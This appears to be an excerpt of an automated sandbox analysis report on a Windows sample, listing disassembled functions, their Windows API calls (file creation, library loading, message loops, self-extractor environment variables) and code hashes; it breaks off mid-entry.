                                                                    control_flow_graph 1014 d9b2b0-d9b2ea call db1590 1017 d9b2ec-d9b2ef 1014->1017 1018 d9b2f5 1014->1018 1017->1018 1020 d9b2f1-d9b2f3 1017->1020 1019 d9b2f7-d9b308 1018->1019 1021 d9b30a 1019->1021 1022 d9b310-d9b31a 1019->1022 1020->1019 1021->1022 1023 d9b31c 1022->1023 1024 d9b31f-d9b32c call d97eed 1022->1024 1023->1024 1027 d9b32e 1024->1027 1028 d9b334-d9b34d CreateFileW 1024->1028 1027->1028 1029 d9b39b-d9b39f 1028->1029 1030 d9b34f-d9b36e GetLastError call d9da1e 1028->1030 1031 d9b3a3-d9b3a6 1029->1031 1034 d9b3a8-d9b3ad 1030->1034 1039 d9b370-d9b393 CreateFileW GetLastError 1030->1039 1033 d9b3b9-d9b3be 1031->1033 1031->1034 1037 d9b3df-d9b3f0 1033->1037 1038 d9b3c0-d9b3c3 1033->1038 1034->1033 1036 d9b3af 1034->1036 1036->1033 1041 d9b40b-d9b424 call db10f9 1037->1041 1042 d9b3f2-d9b407 call da268b 1037->1042 1038->1037 1040 d9b3c5-d9b3d9 SetFileTime 1038->1040 1039->1031 1043 d9b395-d9b399 1039->1043 1040->1037 1042->1041 1043->1031
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D98846,?,00000005), ref: 00D9B342
                                                                    • GetLastError.KERNEL32(?,?,00D98846,?,00000005), ref: 00D9B34F
                                                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D98846,?,00000005), ref: 00D9B382
                                                                    • GetLastError.KERNEL32(?,?,00D98846,?,00000005), ref: 00D9B38A
                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D98846,?,00000005), ref: 00D9B3D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$CreateErrorLast$Time
                                                                    • String ID:
                                                                    • API String ID: 1999340476-0
                                                                    • Opcode ID: 2e6894e4983f485218fd782a5acfa102f1f39823ac7f97e37d30b913226a7bc2
                                                                    • Instruction ID: 74ddd0bd128da09d5595b452d751be3608648e0613bc8cfcdc3368f4f1cffb28
                                                                    • Opcode Fuzzy Hash: 2e6894e4983f485218fd782a5acfa102f1f39823ac7f97e37d30b913226a7bc2
                                                                    • Instruction Fuzzy Hash: D7413930545346AFDB20DF24EE45BAABBD4FF44320F150B1AF5A1962C0D7B09844CBB1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1077 dad864-dad87d PeekMessageW 1078 dad8b8-dad8ba 1077->1078 1079 dad87f-dad893 GetMessageW 1077->1079 1080 dad8a4-dad8b2 TranslateMessage DispatchMessageW 1079->1080 1081 dad895-dad8a2 IsDialogMessageW 1079->1081 1080->1078 1081->1078 1081->1080
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
                                                                    • IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
                                                                    • TranslateMessage.USER32(?), ref: 00DAD8A8
                                                                    • DispatchMessageW.USER32(?), ref: 00DAD8B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 1266772231-0
                                                                    • Opcode ID: 3ea2900450e4234ad1eaec87d1a14fd09b34543d6edc0e281b943c9a22623037
                                                                    • Instruction ID: 59cfe2a1b90c86150a8911aa70366e6d72ab83f8bb2b2b70339b8b5e75f88a19
                                                                    • Opcode Fuzzy Hash: 3ea2900450e4234ad1eaec87d1a14fd09b34543d6edc0e281b943c9a22623037
                                                                    • Instruction Fuzzy Hash: 61F0BD7190521AAB9B20ABB59C4CDEB7F7CEE06691B008415B516D2150EA28D505C7F0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1082 dacb49-dacb72 GetClassNameW 1083 dacb9a-dacb9c 1082->1083 1084 dacb74-dacb89 call da4168 1082->1084 1086 dacb9e-dacba1 SHAutoComplete 1083->1086 1087 dacba7-dacbb3 call db10f9 1083->1087 1090 dacb8b-dacb97 FindWindowExW 1084->1090 1091 dacb99 1084->1091 1086->1087 1090->1091 1091->1083
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00DACB6A
                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00DACBA1
                                                                      • Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E
                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DACB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                    • String ID: EDIT
                                                                    • API String ID: 4243998846-3080729518
                                                                    • Opcode ID: 1e2d73c90ef47c6ab0839399320c672f0c15ddf7483f4cc9bb8873fc9f318a3e
                                                                    • Instruction ID: a9e508c826b8d995448541d3a4aa765fb48241487b95822504b2d1c6f6674131
                                                                    • Opcode Fuzzy Hash: 1e2d73c90ef47c6ab0839399320c672f0c15ddf7483f4cc9bb8873fc9f318a3e
                                                                    • Instruction Fuzzy Hash: 9EF04435A01314BBDB209B25DD06FAFB7ACDF96710F054055B941F7280DBB0DA05CAB5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1093 daffdd-db0011 call db1590 SetEnvironmentVariableW call da23d6 1097 db0016-db001a 1093->1097 1098 db003e-db004a call db10f9 1097->1098 1099 db001c-db0020 1097->1099 1101 db0029-db0030 call da24f2 1099->1101 1105 db0022-db0028 1101->1105 1106 db0032-db0038 SetEnvironmentVariableW 1101->1106 1105->1101 1106->1098
                                                                    APIs
                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DAFFFE
                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DB0038
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentVariable
                                                                    • String ID: sfxcmd$sfxpar
                                                                    • API String ID: 1431749950-3493335439
                                                                    • Opcode ID: 77bbf166f99eff31205843662b092465b8378cbf211d46f5728c9041f253881e
                                                                    • Instruction ID: 2d387abd5eca9b4e461845e12f0c2b7bfe5e68431b383859293545e912a8934c
                                                                    • Opcode Fuzzy Hash: 77bbf166f99eff31205843662b092465b8378cbf211d46f5728c9041f253881e
                                                                    • Instruction Fuzzy Hash: 17F09671901325EBCB20AB958C15EFF77ACDF1EB41744005AB942D7241DAB5DD40D6B1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1107 db6232-db6247 LoadLibraryExW 1108 db627b-db627c 1107->1108 1109 db6249-db6252 GetLastError 1107->1109 1110 db6279 1109->1110 1111 db6254-db6268 call db88f8 1109->1111 1110->1108 1111->1110 1114 db626a-db6278 LoadLibraryExW 1111->1114
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00DB61E3,00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx), ref: 00DB623F
                                                                    • GetLastError.KERNEL32(?,00DB61E3,00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx,00000000,?,00DB613D), ref: 00DB6249
                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00DB5083), ref: 00DB6271
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: a75b00aa0bd22f893ff5283e3aa9749a218c679479f892180b2b7a385bd520ee
                                                                    • Instruction ID: 8c9b8862dc132d4a46574ec1ffb9fe4cc9466544e0165383143fb7d9abddf7f5
                                                                    • Opcode Fuzzy Hash: a75b00aa0bd22f893ff5283e3aa9749a218c679479f892180b2b7a385bd520ee
                                                                    • Instruction Fuzzy Hash: 23E09A34680306FBEF111B61EC06FA97A69EB10B51F144424FA0EE81E1DBA5DD5199A8

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1115 d9b151-d9b15d 1116 d9b16a-d9b181 ReadFile 1115->1116 1117 d9b15f-d9b167 GetStdHandle 1115->1117 1118 d9b1dd 1116->1118 1119 d9b183-d9b18c call d9b288 1116->1119 1117->1116 1120 d9b1e0-d9b1e3 1118->1120 1123 d9b18e-d9b196 1119->1123 1124 d9b1a5-d9b1a9 1119->1124 1123->1124 1125 d9b198 1123->1125 1126 d9b1ab-d9b1b4 GetLastError 1124->1126 1127 d9b1ba-d9b1be 1124->1127 1130 d9b199-d9b1a3 call d9b151 1125->1130 1126->1127 1131 d9b1b6-d9b1b8 1126->1131 1128 d9b1d8-d9b1db 1127->1128 1129 d9b1c0-d9b1c8 1127->1129 1128->1120 1129->1128 1132 d9b1ca-d9b1d3 GetLastError 1129->1132 1130->1120 1131->1120 1132->1128 1134 d9b1d5-d9b1d6 1132->1134 1134->1130
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B161
                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B179
                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B1AB
                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B1CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FileHandleRead
                                                                    • String ID:
                                                                    • API String ID: 2244327787-0
                                                                    • Opcode ID: 9a14cda3347e0b51c83cf1ecb468b5838e2a75584e0c723746fb4c10859b3c3e
                                                                    • Instruction ID: cae98c75d6337a2d0bdf778fb2203cf0a4bc0f3f2103d7f575db04250b380279
                                                                    • Opcode Fuzzy Hash: 9a14cda3347e0b51c83cf1ecb468b5838e2a75584e0c723746fb4c10859b3c3e
                                                                    • Instruction Fuzzy Hash: 3911AC30900309EBDF205F20EA18A6A37A9FB413B1F15862BE866F5290D770DE449B71
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00DB688D,00000000,00000000,?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue), ref: 00DBD3B6
                                                                    • GetLastError.KERNEL32(?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue,00DCAC00,FlsSetValue,00000000,00000364,?,00DBBA77), ref: 00DBD3C2
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue,00DCAC00,FlsSetValue,00000000), ref: 00DBD3D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: adc828e59ba9fbb8f0921484617530030efc63bb2f04a9bf460a709d780c0556
                                                                    • Instruction ID: bee540e5a152a27e172b21fe4daa0fd7185d17a0e82486ee68e8980af0d34de3
                                                                    • Opcode Fuzzy Hash: adc828e59ba9fbb8f0921484617530030efc63bb2f04a9bf460a709d780c0556
                                                                    • Instruction Fuzzy Hash: E801F736651327EBCB214B699C44E977BD9EF04BA17190620F957D7381EB20D801CAF1
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00DA3129
                                                                    • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00DA3170
                                                                      • Part of subcall function 00D97BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D97BD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                    • String ID: CreateThread failed
                                                                    • API String ID: 2655393344-3849766595
                                                                    • Opcode ID: c8102cab076e58e8b96e722b21adead924fb105a813bc1730deaa5914053aa15
                                                                    • Instruction ID: 507dfbacc4222dd41d0e71d66d818148ae47cb7e23fedb876d3914f347bcb768
                                                                    • Opcode Fuzzy Hash: c8102cab076e58e8b96e722b21adead924fb105a813bc1730deaa5914053aa15
                                                                    • Instruction Fuzzy Hash: 2801F4B17487077FD7247F54EC82FB677A9EB42712F20012EF682A72C0CAA0A8458774
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D9F306,00000001,?,?,?,00000000,00DA7564,?,?,?,?), ref: 00D9B9DE
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00D9BA25
                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D9F306,00000001,?,?,?), ref: 00D9BA51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$Handle
                                                                    • String ID:
                                                                    • API String ID: 4209713984-0
                                                                    • Opcode ID: 1a4340d98e57cc100207174dfc38d52658a56087ba05f15c205a8f90e046b0b2
                                                                    • Instruction ID: 988f8198827e6f27e43588b508cc25b16d741e7acc396fb833dea78969f23ac5
                                                                    • Opcode Fuzzy Hash: 1a4340d98e57cc100207174dfc38d52658a56087ba05f15c205a8f90e046b0b2
                                                                    • Instruction Fuzzy Hash: B231A271208306AFDF14CF24EA48B6A77A5FF81725F15461EF581A7290CBB49D48CBB2
                                                                    APIs
                                                                      • Part of subcall function 00D9E1EC: _wcslen.LIBCMT ref: 00D9E1F2
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF12
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF45
                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2260680371-0
                                                                    • Opcode ID: 024e261ade3adf245cbd7f203bf2af8f4640cb53bab4cfc28383fbb533851795
                                                                    • Instruction ID: 3c872930c16b612a5fa12ad97285fc7a5f74d46bbcae04691fe01abef294d44c
                                                                    • Opcode Fuzzy Hash: 024e261ade3adf245cbd7f203bf2af8f4640cb53bab4cfc28383fbb533851795
                                                                    • Instruction Fuzzy Hash: 50110431200319AADF21AF70AE45BFE73A8DF09710F094456F902E7191DB65DE81CA75
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00DBDF08
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID:
                                                                    • API String ID: 1807457897-3916222277
                                                                    • Opcode ID: b9167b76c336c236439970b006248bdde084cb5fce0b6a562d15b152cedc3674
                                                                    • Instruction ID: aac71717e97c3163b0a3f580e7d266792e3b4e861ac27599778540ef830cc99a
                                                                    • Opcode Fuzzy Hash: b9167b76c336c236439970b006248bdde084cb5fce0b6a562d15b152cedc3674
                                                                    • Instruction Fuzzy Hash: F941C570508388DADB218E688C84AF6BBEADF49304F1804EDE59B87142E275AA459F70
                                                                    APIs
                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00DBD62D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: String
                                                                    • String ID: LCMapStringEx
                                                                    • API String ID: 2568140703-3893581201
                                                                    • Opcode ID: b6224c5f382288e0f5b480d955958b20a2d27fec040ca0eb49d9203ee04d9cc9
                                                                    • Instruction ID: 32b1b0630052a11d7581b837d3a67830022dcec5d833df48366313a75125374e
                                                                    • Opcode Fuzzy Hash: b6224c5f382288e0f5b480d955958b20a2d27fec040ca0eb49d9203ee04d9cc9
                                                                    • Instruction Fuzzy Hash: C501133250020EFBCF126F94DD02EEE7F62EF08720F004119FE0966160D6768931ABA5
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00DBCBBF), ref: 00DBD5A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                    • String ID: InitializeCriticalSectionEx
                                                                    • API String ID: 2593887523-3084827643
                                                                    • Opcode ID: 9ef3e1f6fd4dbd8ebece0bccad8f2a708e4d4a6c1470d64408921f0744a39119
                                                                    • Instruction ID: 68e5d054bb588e822fde3d9f1be9a1a2c5d983abc56f9c0a4a24439bfac347d6
